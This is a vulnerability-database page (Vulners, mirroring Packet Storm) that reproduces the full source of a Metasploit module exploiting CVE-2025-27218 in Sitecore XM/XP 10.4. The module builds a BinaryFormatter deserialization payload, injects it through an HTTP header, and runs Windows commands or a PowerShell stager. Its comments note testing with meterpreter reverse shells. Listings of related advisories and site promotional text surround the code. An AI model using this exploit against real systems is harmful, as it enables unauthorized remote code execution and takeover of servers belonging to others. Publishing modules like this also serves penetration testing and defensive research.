Vulners
Lucene search
Sitecore CVE-2025-27218 BinaryFormatter Deserialization
🗓️ 28 Mar 2025 00:00:00Reported by machang-r7, Dylan PindurType 
packetstorm🔗 packetstorm.news👁 367 Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | CVE-2025-27218 | 20 Feb 202506:41 | – | circl |
 | Sitecore Experience Manager和Experience Platform 安全漏洞 | 20 Feb 202500:00 | – | cnnvd |
 | CVE-2025-27218 | 20 Feb 202500:00 | – | cve |
 | CVE-2025-27218 | 20 Feb 202500:00 | – | cvelist |
 | Sitecore 10.4 - Remote Code Execution (RCE) | 26 Jun 202500:00 | – | exploitdb |
 | Mars: insecure deserilize object leads to RCE On Sitecore (CVE-██████████-27218) | 12 Apr 202514:39 | – | hackerone |
 | Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit | 28 Mar 202518:50 | – | metasploit |
 | Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4 - Insecure Deserialization | 5 Jun 202603:02 | – | nuclei |
 | CVE-2025-27218 | 20 Feb 202505:15 | – | nvd |
| 📄 Sitecore 10.4 Remote Code Execution | 27 Jun 202500:00 | – | packetstorm |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Util::DotNetDeserialization
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
'Description' => %q{
This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
},
'License' => MSF_LICENSE,
'Author' => [
'Dylan Pindur', # Discovery
'machang-r7' # Module Creator
],
'References' => [
['CVE', '2025-27218'],
['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
],
'DisclosureDate' => '2025-01-06',
'DefaultTarget' => 0,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :windows_command
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
],
[
'PowerShell Stager',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager
# tested with windows/x64/meterpreter/reverse_tcp
}
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
})
if res&.code == 200 && res&.get_html_document&.at('//title')&.text&.strip == 'Welcome to Sitecore'
CheckCode::Detected('The target is running SiteCore.')
else
CheckCode::Safe('The target does not appear to be running SiteCore.')
end
end
def exploit
case target['Type']
when :windows_command
execute_command(payload.encoded)
when :psh_stager
execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
end
end
def execute_command(cmd, _opts = {})
sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :WindowsIdentity,
formatter: :BinaryFormatter
))
# Build HTTP request with malicious header
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'headers' => {
'Thumbnailsaccesstoken' => sploit
}
})
if res && res.code == 200
print_good('Server responded with 200, this probably means it worked.')
else
print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Mar 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.15.3
EPSS0.75678
SSVC